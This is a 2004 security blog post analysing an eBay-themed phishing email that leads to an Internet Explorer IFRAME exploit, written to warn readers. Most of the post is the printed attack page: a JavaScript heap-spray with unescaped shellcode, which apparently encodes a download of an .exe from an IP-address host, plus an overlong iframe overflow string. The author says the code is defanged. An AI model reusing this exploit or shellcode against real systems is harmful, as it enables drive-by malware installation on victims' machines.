JaBbA's Hut

Friday, December 3. 2004

New eBay hack via IE Vulnerability

This email was received by someone who just purchased a few things on eBay. He remarked that he hadn't seen more than couple of eBay phishes until after he actually purchased something. Nobody's sure, but it seems suspicious that eBay activity would cause someone to be targeted - How would the phishers get that information?

Anyway, it turns out this isn't just a phishing scheme, it's a full-blown hack attempt. The button connects to a website on an IP address owned by Charter Communications in Fort Worth, TX, apparently in the downtown area. The computer is fully hacked - the index page does the same hack as the actual link in the email.

It's a nasty attempt to exploit an IFRAME vulnerability with some javascript shellcode. The actual code obfuscates what it's doing with a NULL character between each byte - I've removed the NULL characters and put the code in the extended entry. NOTE: The code has been defanged a couple of ways. If you are interested and are a legitimate security researcher, not someone looking for cool shellcode hacks, contact me and I can provide you with the source. You'll have to be able to verify who you are.

And the hacker? Probably a p0ser - the code was create on Windoze. JaBbA says *Phey*!

<ff><fe><html><head><script language="javascript">^M
shellcode = unescape(" %u5353 %u5353 %uEB53 %u5653 %u8B57 %u3C45 %u548B %u7828 %uD503 %u8B52 %u2052 %uD503 %uC033 %uC933 %u8B41 %u8A34 %uF503 %uFF33 %uCFC1 %uAC13 %uF803 %uC085 %uF675 %uFB3B %uEA75 %u8B5A %u245A %uDD03 %u8B66 %u4B0C %u5A8B %u031C %u8BDD %u8B04 %uC503 %u5E5F %uE0FF %u8C66 %uA8D8 %u7404 %u333C %u64C0 %u00A1 %u0000 %u8100 %u0478 %u0000 %u7000 %u0473 %u008B %uF3EB %u408B %u6604 %uC02B %u8166 %u4D38 %u745A %u2D07 %u0000 %u0001 %uF2EB %u508B %u663C %u3C81 %u5002 %u0F45 %uA985 %u0000 %u8B00 %uEBE8 %u3311 %uFCC0 %u8B64 %u3040 %u408B %u8B0C %u1C70 %u8BAD %u0868 %uC481 %uFE50 %uFFFF %uF48B %u6856 %u0096 %u0000 %u79BB %uE741 %uE888 %uFF51 %uFFFF %uD68B %uC033 %u0BAC %u75C0 %uC7FB %uFF46 %u3630 %u3636 %u46C7 %u2E03 %u7865 %uC665 %u0746 %u8B00 %u33F2 %u66C0 %u6CB8 %u506C %u6F68 %u2E6E %u6864 %u7275 %u6D6C %uBB54 %uA771 %uFEE8 %u18E8 %uFFFF %u8BFF %u8BFD %uE8E8 %u0000 %u0000 %u815A %uF8EA %u4010 %u6A00 %u6A00 %u5600 %u928D %u1135 %u0040 %u6A52 %uBB00 %uC07D %u8318 %uF0E8 %uFFFE %u6AFF %u5601 %uEF8B %uE0BB %u76DC %uE850 %uFEE1 %uFFFF %u006A %u69BB %u421D %uE83A %uFED5 %uFFFF %u08C2 %u6800 %u7474 %u3A70 %u2F2F %u3636 %u312E %u3039 %u372E %u2E38 %u3631 %u2F35 %u736D %u6174 %u6B73 %u2E73 %u7865 %u0065 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %u0000 %uBB00 %u01FD %u0000 %u006A %u8068 %u0000 %u6A00 %u6A03 %u6A00 %u6801 %u0000 %u8000 %u0068 %u4030 %uE800 %u013A %u00");^M
bigblock = unescape(" %u0D0D %u0D0D"); headersize = 20;^M
slackspace = headersize+shellcode.length^M
while (bigblock.length<slackspace) bigblock+=bigblock;^M
fillblock = bigblock.substring(0, slackspace);^M
block = bigblock.substring(0, bigblock.length-slackspace);^M
while(block.length+slackspace<0x40000) block = block+block+fillblock;^M
memory = new Array();i=0;^M
while (i<699){ memory[i] = block + shellcode ; i++; }^M
</script></head><body>^M
<iframe src=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBB^M
^M
name="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCC^MM^MM"></iframe>^M
</body></html>

Posted by JaBbA in Phishing, Security at 13:03 | Comments (0) | Trackbacks (0)

Trackbacks

Trackback specific URI for this entry

No Trackbacks

Comments

Display comments as (Linear | Threaded)

No comments

Add Comment

Name
Email
Homepage
In reply to
Comment	Enclosing asterisks marks text as bold (word), underscore are made via _word_. Standard emoticons like :-) and ;-) are converted to images. BBCode format allowed E-Mail addresses will not be displayed and will only be used for E-Mail notifications To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly. Enter the string from the spam-prevention image above:
	Remember Information? Subscribe to this entry

Today's Tao (Chapter 50):

Contact Me

Subscribe

Quicksearch

About Me

Calendar

Archives

Syndicate This Blog

Blog Administration

Categories

Powered by

Creative Commons License

JaBbA's Hut

White Hat Liberal Geek Dad

Friday, December 3. 2004

New eBay hack via IE Vulnerability